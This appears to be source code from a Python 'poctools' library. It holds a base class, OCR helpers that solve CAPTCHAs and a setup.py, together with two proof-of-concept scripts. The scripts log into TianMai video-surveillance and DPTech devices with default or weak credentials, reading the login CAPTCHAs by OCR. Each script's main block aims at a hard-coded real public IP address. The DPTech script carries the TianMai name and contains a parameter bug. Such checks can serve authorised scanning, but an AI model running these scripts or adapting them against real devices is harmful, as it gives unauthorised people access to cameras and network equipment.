from poctools import BasicPoc
from poctools.encrypt import md5
from poctools.ocr import new_number


class TianMaiNetworkVideoSurveillanceWeakCipherPoc(BasicPoc):
    jsessionid_uri = "/login.jsp"
    login_uri = "/j_login.auth"
    verify_code_uri = "/jsp/common/validateCode.jsp"

    def __init__(self):
        super(TianMaiNetworkVideoSurveillanceWeakCipherPoc, self).__init__()
        self.name = "天迈网络视频监控弱密码"

    def verify(self, url: str) -> bool:
        jsessionid_response = self.get(url + self.jsessionid_uri)
        if jsessionid_response is None:
            return False
        payload = {"j_apptype": "1", "j_username": "admin", "remember-me": False}
        while True:
            verify_code_response = self.get(url + self.verify_code_uri)
            if verify_code_response is None:
                return False
            code = new_number(verify_code_response.content)
            if len(code) != 4:
                continue
            payload.setdefault("validateCode", code)
            payload.setdefault("j_password", md5("admin" + code))
            login_response = self.post(url + self.login_uri, data=payload)
            if login_response is None:
                return False
            return login_response.status_code == 200 and "验证码有误" not in login_response.text


if __name__ == '__main__':
    target = "http://221.176.217.58:18080"
    tp = TianMaiNetworkVideoSurveillanceWeakCipherPoc()
    result = tp.run(target)
    print(f"{target} -> {result}")



from poctools import BasicPoc
from poctools.encrypt import md5
from poctools.ocr import new_ocr
from datetime import datetime


class DPTechWeakCipherPoc(BasicPoc):
    jsessionid_uri = "/login.jsp"
    login_uri = "/j_login.auth"
    verify_code_uri = "/func/web_main/validate"

    def __init__(self):
        super(DPTechWeakCipherPoc, self).__init__()
        self.name = "天迈网络视频监控弱密码"

    @staticmethod
    def check_key():
        a = datetime.now()
        s = f"{a.year - 1900}{a.month}{a.weekday()+1}{a.hour}{a.minute}{a.second}001"
        return md5(s)

    def verify(self, url: str) -> bool:
        payload = {
            "user_name": "%89%94%90%83%86", 
            "password": "%67%91%66%86%81%82%83%104%89%94%90%83%86", 
            "language": 1,
            "password1": "",
            "otp_value": "",
            "verify": ""
        }
        while True:
            check = self.check_key()
            verify_code_response = self.get(url + self.verify_code_uri, params={"check", check})
            if verify_code_response is None:
                return False
            print(verify_code_response.content)
            code = new_ocr(verify_code_response.content, "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ")
            if len(code) != 4:
                continue
            payload.setdefault("code", code)
            payload.setdefault("check", check)
            login_response = self.post(url + self.login_uri, data=payload)
            if login_response is None:
                return False
            print(login_response.text)
            return True


if __name__ == '__main__':
    target = "https://219.157.116.100:4443"
    tp = DPTechWeakCipherPoc()
    result = tp.run(target)
    print(f"{target} -> {result}")







import cv2
import numpy as np
import pytesseract

from .config import NUMBER_OCR_CONFIG


def new_number(image_data: bytes) -> str:
    image = cv2.imdecode(np.asarray(bytearray(image_data), dtype=np.uint8), cv2.IMREAD_COLOR)
    image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    _, image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)
    return pytesseract.image_to_string(image, lang='eng', config=NUMBER_OCR_CONFIG).strip()


def new_ocr(image_data: bytes, charset: str) -> str:
    config = f"--psm 10 --oem 3 -c tessedit_char_whitelist={charset}"
    image = cv2.imdecode(np.asarray(bytearray(image_data), dtype=np.uint8), cv2.IMREAD_COLOR)
    image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    _, image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)
    return pytesseract.image_to_string(image, lang='eng', config=config).strip()



import setuptools

with open("README.md", encoding="utf-8") as file:
    long_description = file.read()

setuptools.setup(
    name="poctools",
    version="0.0.3",
    author="itmeng",
    author_email="yanitmeng@gmail.net",
    description="poc common tool library",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/yanmengfei/poctools",
    packages=setuptools.find_packages()
)



import abc
import logging
from typing import Union

import requests
import urllib3

urllib3.disable_warnings()


class BasicPoc(metaclass=abc.ABCMeta):
    log_level = logging.INFO

    def __init__(self) -> None:
        self.logger = logging.Logger("BasicPoc", level=logging.INFO)
        self.mode = 'common'
        self.name = "BasicPoc"
        self.example = ""
        self.session = requests.Session()
        self.session.headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"}
        self.session.verify = False

    def set_loglevel(self, level: Union[int, str]) -> None:
        self.logger.setLevel(level)

    def set_headers(self, headers: dict = None):
        if headers is not None:
            self.session.headers = headers

    def request(self, url: str, method: str = 'get', timeout: int = 10, **kwargs) -> requests.Response:
        try:
            resp = self.session.request(method, url, timeout=timeout, **kwargs)
        except requests.exceptions.RequestException as e:
            self.logger.warning(f'Run Poc[{self.name}] => {url} Error:\n\t{e}')
            resp = None
        return resp

    def get(self, url: str, **kwargs) -> requests.Response:
        return self.request(url, method='get', **kwargs)

    def post(self, url: str, **kwargs) -> requests.Response:
        return self.request(url, method='post', **kwargs)

    def put(self, url: str, **kwargs) -> requests.Response:
        return self.request(url, method='put', **kwargs)

    def head(self, url: str, **kwargs) -> requests.Response:
        return self.request(url, method='head', **kwargs)

    @abc.abstractmethod
    def verify(self, url):
        pass

    def run(self, url):
        self.logger.info(f'testing {url} with {self.name}')
        return self.verify(url)
